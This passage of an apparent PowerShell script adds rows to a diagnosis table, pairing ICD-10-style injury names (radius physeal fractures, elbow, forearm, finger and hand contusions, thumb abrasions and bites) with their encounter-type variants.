Type III physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of radius, unspecified arm","Salter-Harris Type III physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of radius, unspecified arm","Salter-Harris Type III physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of radius, unspecified arm","Salter-Harris Type III physeal fracture of lower end of radius, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of radius, right arm","Salter-Harris Type IV physeal fracture of lower end of radius, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of radius, right arm","Salter-Harris Type IV physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of radius, right arm","Salter-Harris Type IV physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of radius, right arm","Salter-Harris Type IV physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of radius, right arm","Salter-Harris Type IV physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of radius, right arm","Salter-Harris Type IV physeal fracture of lower end of radius, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of radius, left arm","Salter-Harris Type IV physeal fracture of lower end of radius, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of radius, left arm","Salter-Harris Type IV physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of radius, left arm","Salter-Harris Type IV physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of radius, left arm","Salter-Harris Type IV physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of radius, left arm","Salter-Harris Type IV physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of radius, left arm","Salter-Harris Type IV physeal fracture of lower end of radius, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of radius, unspecified arm","Salter-Harris Type IV physeal fracture of lower end of radius, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of radius, unspecified arm","Salter-Harris Type IV physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of radius, unspecified arm","Salter-Harris Type IV physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of radius, unspecified arm","Salter-Harris Type IV physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of radius, unspecified arm","Salter-Harris Type IV physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of radius, unspecified arm","Salter-Harris Type IV physeal fracture of lower end of radius, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of radius, right arm","Other physeal fracture of lower end of radius, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of radius, right arm","Other physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of radius, right arm","Other physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of radius, right arm","Other physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of radius, right arm","Other physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of radius, right arm","Other physeal fracture of lower end of radius, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of radius, left arm","Other physeal fracture of lower end of radius, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of radius, left arm","Other physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of radius, left arm","Other physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of radius, left arm","Other physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of radius, left arm","Other physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of radius, left arm","Other physeal fracture of lower end of radius, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of radius, unspecified arm","Other physeal fracture of lower end of radius, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of radius, unspecified arm","Other physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of radius, unspecified arm","Other physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of radius, unspecified arm","Other physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of radius, unspecified arm","Other physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of radius, unspecified arm","Other physeal fracture of lower end of radius, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right elbow","Other specified injuries of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right elbow","Other specified injuries of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right elbow","Other specified injuries of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left elbow","Other specified injuries of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left elbow","Other specified injuries of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left elbow","Other specified injuries of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified elbow","Other specified injuries of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified elbow","Other specified injuries of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified elbow","Other specified injuries of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries right forearm","Other specified injuries right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries right forearm","Other specified injuries right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries right forearm","Other specified injuries right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries left forearm","Other specified injuries left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries left forearm","Other specified injuries left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries left forearm","Other specified injuries left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries unspecified forearm","Other specified injuries unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries unspecified forearm","Other specified injuries unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries unspecified forearm","Other specified injuries unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right elbow","Unspecified injury of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right elbow","Unspecified injury of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right elbow","Unspecified injury of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left elbow","Unspecified injury of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left elbow","Unspecified injury of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left elbow","Unspecified injury of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified elbow","Unspecified injury of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified elbow","Unspecified injury of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified elbow","Unspecified injury of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right forearm","Unspecified injury of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right forearm","Unspecified injury of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right forearm","Unspecified injury of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left forearm","Unspecified injury of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left forearm","Unspecified injury of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left forearm","Unspecified injury of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified forearm","Unspecified injury of unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified forearm","Unspecified injury of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified forearm","Unspecified injury of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified finger without damage to nail","Contusion of unspecified finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified finger without damage to nail","Contusion of unspecified finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified finger without damage to nail","Contusion of unspecified finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right thumb without damage to nail","Contusion of right thumb without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right thumb without damage to nail","Contusion of right thumb without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right thumb without damage to nail","Contusion of right thumb without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left thumb without damage to nail","Contusion of left thumb without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left thumb without damage to nail","Contusion of left thumb without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left thumb without damage to nail","Contusion of left thumb without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified thumb without damage to nail","Contusion of unspecified thumb without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified thumb without damage to nail","Contusion of unspecified thumb without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified thumb without damage to nail","Contusion of unspecified thumb without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right index finger without damage to nail","Contusion of right index finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right index finger without damage to nail","Contusion of right index finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right index finger without damage to nail","Contusion of right index finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left index finger without damage to nail","Contusion of left index finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left index finger without damage to nail","Contusion of left index finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left index finger without damage to nail","Contusion of left index finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified index finger without damage to nail","Contusion of unspecified index finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified index finger without damage to nail","Contusion of unspecified index finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified index finger without damage to nail","Contusion of unspecified index finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right middle finger without damage to nail","Contusion of right middle finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right middle finger without damage to nail","Contusion of right middle finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right middle finger without damage to nail","Contusion of right middle finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left middle finger without damage to nail","Contusion of left middle finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left middle finger without damage to nail","Contusion of left middle finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left middle finger without damage to nail","Contusion of left middle finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified middle finger without damage to nail","Contusion of unspecified middle finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified middle finger without damage to nail","Contusion of unspecified middle finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified middle finger without damage to nail","Contusion of unspecified middle finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right ring finger without damage to nail","Contusion of right ring finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right ring finger without damage to nail","Contusion of right ring finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right ring finger without damage to nail","Contusion of right ring finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left ring finger without damage to nail","Contusion of left ring finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left ring finger without damage to nail","Contusion of left ring finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left ring finger without damage to nail","Contusion of left ring finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified ring finger without damage to nail","Contusion of unspecified ring finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified ring finger without damage to nail","Contusion of unspecified ring finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified ring finger without damage to nail","Contusion of unspecified ring finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right little finger without damage to nail","Contusion of right little finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right little finger without damage to nail","Contusion of right little finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right little finger without damage to nail","Contusion of right little finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left little finger without damage to nail","Contusion of left little finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left little finger without damage to nail","Contusion of left little finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left little finger without damage to nail","Contusion of left little finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified little finger without damage to nail","Contusion of unspecified little finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified little finger without damage to nail","Contusion of unspecified little finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified little finger without damage to nail","Contusion of unspecified little finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified finger with damage to nail","Contusion of unspecified finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified finger with damage to nail","Contusion of unspecified finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified finger with damage to nail","Contusion of unspecified finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right thumb with damage to nail","Contusion of right thumb with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right thumb with damage to nail","Contusion of right thumb with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right thumb with damage to nail","Contusion of right thumb with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left thumb with damage to nail","Contusion of left thumb with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left thumb with damage to nail","Contusion of left thumb with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left thumb with damage to nail","Contusion of left thumb with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified thumb with damage to nail","Contusion of unspecified thumb with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified thumb with damage to nail","Contusion of unspecified thumb with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified thumb with damage to nail","Contusion of unspecified thumb with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right index finger with damage to nail","Contusion of right index finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right index finger with damage to nail","Contusion of right index finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right index finger with damage to nail","Contusion of right index finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left index finger with damage to nail","Contusion of left index finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left index finger with damage to nail","Contusion of left index finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left index finger with damage to nail","Contusion of left index finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified index finger with damage to nail","Contusion of unspecified index finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified index finger with damage to nail","Contusion of unspecified index finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified index finger with damage to nail","Contusion of unspecified index finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right middle finger with damage to nail","Contusion of right middle finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right middle finger with damage to nail","Contusion of right middle finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right middle finger with damage to nail","Contusion of right middle finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left middle finger with damage to nail","Contusion of left middle finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left middle finger with damage to nail","Contusion of left middle finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left middle finger with damage to nail","Contusion of left middle finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified middle finger with damage to nail","Contusion of unspecified middle finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified middle finger with damage to nail","Contusion of unspecified middle finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified middle finger with damage to nail","Contusion of unspecified middle finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right ring finger with damage to nail","Contusion of right ring finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right ring finger with damage to nail","Contusion of right ring finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right ring finger with damage to nail","Contusion of right ring finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left ring finger with damage to nail","Contusion of left ring finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left ring finger with damage to nail","Contusion of left ring finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left ring finger with damage to nail","Contusion of left ring finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified ring finger with damage to nail","Contusion of unspecified ring finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified ring finger with damage to nail","Contusion of unspecified ring finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified ring finger with damage to nail","Contusion of unspecified ring finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right little finger with damage to nail","Contusion of right little finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right little finger with damage to nail","Contusion of right little finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right little finger with damage to nail","Contusion of right little finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left little finger with damage to nail","Contusion of left little finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left little finger with damage to nail","Contusion of left little finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left little finger with damage to nail","Contusion of left little finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified little finger with damage to nail","Contusion of unspecified little finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified little finger with damage to nail","Contusion of unspecified little finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified little finger with damage to nail","Contusion of unspecified little finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right wrist","Contusion of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right wrist","Contusion of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right wrist","Contusion of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left wrist","Contusion of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left wrist","Contusion of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left wrist","Contusion of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified wrist","Contusion of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified wrist","Contusion of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified wrist","Contusion of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right hand","Contusion of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right hand","Contusion of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right hand","Contusion of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left hand","Contusion of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left hand","Contusion of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left hand","Contusion of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified hand","Contusion of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified hand","Contusion of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified hand","Contusion of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of right thumb","Abrasion of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right thumb","Abrasion of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right thumb","Abrasion of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of left thumb","Abrasion of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left thumb","Abrasion of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left thumb","Abrasion of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified thumb","Abrasion of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified thumb","Abrasion of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified thumb","Abrasion of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right thumb","Blister (nonthermal) of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right thumb","Blister (nonthermal) of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right thumb","Blister (nonthermal) of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left thumb","Blister (nonthermal) of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left thumb","Blister (nonthermal) of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left thumb","Blister (nonthermal) of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified thumb","Blister (nonthermal) of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified thumb","Blister (nonthermal) of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified thumb","Blister (nonthermal) of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of right thumb","External constriction of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right thumb","External constriction of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right thumb","External constriction of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of left thumb","External constriction of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left thumb","External constriction of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left thumb","External constriction of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified thumb","External constriction of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified thumb","External constriction of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified thumb","External constriction of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right thumb","Superficial foreign body of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right thumb","Superficial foreign body of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right thumb","Superficial foreign body of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left thumb","Superficial foreign body of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left thumb","Superficial foreign body of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left thumb","Superficial foreign body of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified thumb","Superficial foreign body of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified thumb","Superficial foreign body of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified thumb","Superficial foreign body of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right thumb","Insect bite (nonvenomous) of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right thumb","Insect bite (nonvenomous) of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right thumb","Insect bite (nonvenomous) of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left thumb","Insect bite (nonvenomous) of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left thumb","Insect bite (nonvenomous) of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left thumb","Insect bite (nonvenomous) of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified thumb","Insect bite (nonvenomous) of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified thumb","Insect bite (nonvenomous) of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified thumb","Insect bite (nonvenomous) of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right thumb","Other superficial bite of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right thumb","Other superficial bite of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right thumb","Other superficial bite of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left thumb","Other superficial bite of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left thumb","Other superficial bite of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left thumb","Other superficial bite of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified thumb","Other superficial bite of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified thumb","Other superficial bite of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified thumb","Other superficial bite of unspecified 